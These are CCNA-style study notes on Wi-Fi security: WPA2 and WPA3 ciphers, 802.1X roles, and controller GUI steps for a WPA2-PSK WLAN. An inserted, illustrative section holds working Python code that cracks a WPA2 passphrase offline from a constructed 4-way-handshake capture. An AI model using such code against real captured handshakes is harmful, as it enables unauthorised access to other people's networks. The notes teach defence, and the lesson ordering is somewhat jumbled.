• CCMP block cipher mode – Counter Mode with Cipher Block Chaining Message Authentication Code Protocol
• AES for encryption (AES-CCM)
• Message Integrity Check (MIC) with CBC-MAC
• Very secure, but WPA2-Personal can be brute-forced: an attacker who captures a client's 4-way handshake can test passphrase guesses offline, so the PSK must be long and random
• Highly supported on common devices
WPA3
• GCMP block cipher mode – Galois/Counter Mode Protocol
• Stronger encryption than WPA2
• AES for encryption (AES-GCM)
• MIC with Galois Message Authentication Code (GMAC)
• PSK mutual authentication (client and AP) via Simultaneous Authentication of Equals (SAE)
• SAE is a password-authenticated Diffie-Hellman key exchange: every passphrase guess requires a live exchange with the AP, so a captured handshake cannot be cracked offline, and the session keys have forward secrecy
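Why "possible to be brute-forced" matters for WPA2-Personal, shown as an added example that is not part of the course: the code below derives the PMK exactly as 802.11 specifies (PBKDF2-HMAC-SHA1 over passphrase and SSID), builds a stand-in 4-way-handshake message 2 carrying a real MIC, and then recovers the passphrase from that capture with a dictionary attack that never talks to the access point. The SSID, MAC addresses, nonces, EAPOL frame contents and wordlist are constructed, and the function names are hypothetical.

```python
"""Added example, not from the course slides: offline dictionary attack on a
captured WPA2-PSK 4-way handshake. The PMK (PBKDF2-HMAC-SHA1), PTK (SHA-1 PRF)
and message-2 MIC (HMAC-SHA1, key descriptor version 2 used with CCMP) are
computed as IEEE 802.11 specifies; every value in the 'capture' is constructed."""
import hashlib
import hmac
from typing import List, Optional

# --- constructed capture: what an attacker sniffs from one client association ---
SSID = "CorpWiFi"                               # from the beacon / probe response
AP_MAC = bytes.fromhex("001122334455")          # authenticator address
CLIENT_MAC = bytes.fromhex("66778899aabb")      # supplicant address
ANONCE = bytes(range(32))                       # message 1 (AP -> client)
SNONCE = bytes(range(32, 64))                   # message 2 (client -> AP)
MIC_OFFSET = 81                                 # MIC field offset in an EAPOL-Key frame
WORDLIST: List[str] = ["password", "12345678", "Summer2024!", "CorpWiFi2024", "letmein99"]


def wpa2_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2(HMAC-SHA1, passphrase, SSID, 4096 iterations, 256 bits)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf_sha1(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    """802.11 PRF-n: concatenate HMAC-SHA1(key, label || 0x00 || data || i) for i = 0, 1, ..."""
    out = b""
    i = 0
    while len(out) < nbytes:
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        i += 1
    return out[:nbytes]


def wpa2_kck(pmk: bytes, ap: bytes, client: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """First 16 bytes of the PTK: the Key Confirmation Key that authenticates the handshake."""
    data = min(ap, client) + max(ap, client) + min(anonce, snonce) + max(anonce, snonce)
    return prf_sha1(pmk, b"Pairwise key expansion", data, 64)[:16]


def eapol_mic(kck: bytes, frame: bytes) -> bytes:
    """MIC = HMAC-SHA1(KCK, frame with the MIC field zeroed), truncated to 16 bytes."""
    zeroed = frame[:MIC_OFFSET] + b"\x00" * 16 + frame[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def build_message2(kck: bytes) -> bytes:
    """A stand-in EAPOL-Key message 2; only the MIC over its bytes matters here."""
    head = (b"\x02\x03\x00\x5f"    # 802.1X header: version 2, type EAPOL-Key, body length 95
            + b"\x02"              # descriptor type RSN
            + b"\x01\x0a"          # key info: version 2 (HMAC-SHA1/AES), pairwise, MIC present
            + b"\x00\x10"          # key length 16 (CCMP)
            + b"\x00" * 8          # replay counter
            + SNONCE
            + b"\x00" * 32)        # key IV, key RSC, key ID: zero in message 2
    assert len(head) == MIC_OFFSET
    tail = b"\x00\x00"             # key data length 0 (a real frame carries the RSN IE here)
    mic = eapol_mic(kck, head + b"\x00" * 16 + tail)
    return head + mic + tail


def capture_handshake(true_passphrase: str) -> bytes:
    """Stand-in for sniffing: the message-2 frame the real client would have sent."""
    return build_message2(wpa2_kck(wpa2_pmk(true_passphrase, SSID), AP_MAC, CLIENT_MAC, ANONCE, SNONCE))


def crack_psk(message2: bytes, wordlist: List[str]) -> Optional[str]:
    """Offline attack: derive PMK -> KCK for each candidate and compare the MIC.
    Nothing is sent to the AP; the cost per guess is 4096 HMAC-SHA1 rounds."""
    captured_mic = message2[MIC_OFFSET:MIC_OFFSET + 16]
    for candidate in wordlist:
        kck = wpa2_kck(wpa2_pmk(candidate, SSID), AP_MAC, CLIENT_MAC, ANONCE, SNONCE)
        if hmac.compare_digest(eapol_mic(kck, message2), captured_mic):
            return candidate
    return None


if __name__ == "__main__":
    print(crack_psk(capture_handshake("Summer2024!"), WORDLIST))   # Summer2024!
```

The IEEE test vector used in the check (passphrase "password", SSID "IEEE") confirms the derivation. Note that the SSID is the salt, so a rainbow table only works per SSID, but for a common SSID such tables exist; a unique SSID and a long random passphrase are the only defences WPA2-Personal has. Under WPA3-SAE the PMK comes from a Diffie-Hellman exchange with the AP, so there is no equivalent offline check: each guess costs a live SAE exchange.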
Feature                                    WPA   WPA2   WPA3
Authenticate with pre-shared keys          Yes   Yes    Yes (via SAE)
Authenticate with 802.1X                   Yes   Yes    Yes
Encryption and MIC with TKIP               Yes   No     No
Encryption and MIC with AES and CCMP       No    Yes    No
Encryption and MIC with AES and GCMP       No    No     Yes
Note: this is the CCNA-level summary. In the Wi-Fi Alliance specification WPA3-Personal still uses AES-CCMP-128 together with SAE, and AES-GCMP-256 is mandatory only in the WPA3-Enterprise 192-bit mode. Many WPA2 deployments also still allow TKIP for backward compatibility; it should be disabled.
802.1X and EAP
• With open authentication, wireless clients are accepted locally at the AP without any credential check
• Should only be used where security is of no concern (for example a guest network that relies on a captive portal and carries nothing sensitive)
• EAP messages are encapsulated in EAPOL (EAP over LAN) frames, defined by 802.1X, for network access authentication on wired or wireless links; the authenticator relays them to the authentication server over RADIUS
• 802.1X – the client first uses open authentication to associate with the AP; the association then carries nothing but EAPOL until the client has authenticated against a dedicated authentication server
• Supplicant – client device that is requesting access
• Authenticator – network device that provides access to the network: a switch for wired clients, and for wireless the access point or the wireless LAN controller (WLC)
• Authentication server – device that permits or denies access based on a user database and policies (usually a RADIUS server)
Module 5: Security Fundamentals
Lesson 10: Configure WLAN using WPA2 PSK using the GUI

• Configure WLAN using WPA2 PSK using the GUI
Module 2: Network Access
Lesson 9: Configure the components of a wireless LAN access for
client connectivity using GUI

• WLAN creation
• Create Dynamic Interface
• Controller -> Interfaces -> New
• Enter Interface Name
• Enter VLAN ID
• Enter an IP address for the controller within that VLAN's subnet (the interface also needs its netmask, gateway and the DHCP server address the controller relays client requests to)

• WLAN creation
• Create WLAN
• WLANs -> Create New
• Enter profile name
• Enter SSID
• Click Apply

• Security settings
• Security -> Layer 2 tab -> Layer 2 Security: WPA+WPA2
• Tick WPA2 Policy with AES encryption (leave WPA Policy/TKIP unchecked, since TKIP is deprecated) and, under Authentication Key Management, tick PSK
• Select ASCII as the PSK format and enter a long, random passphrase; as Lesson 9 explains, a short or dictionary passphrase is the weak point of WPA2-PSK because the handshake can be attacked offline

• QoS profiles
• Dictate how the WLAN's traffic is prioritized:
• Platinum – voice
• Gold – video
• Silver – best effort (the default for regular data traffic)
• Bronze – background traffic

• Advanced WLAN settings
• Specify session timeout value
• URL filtering
• Maximum number of clients
• And more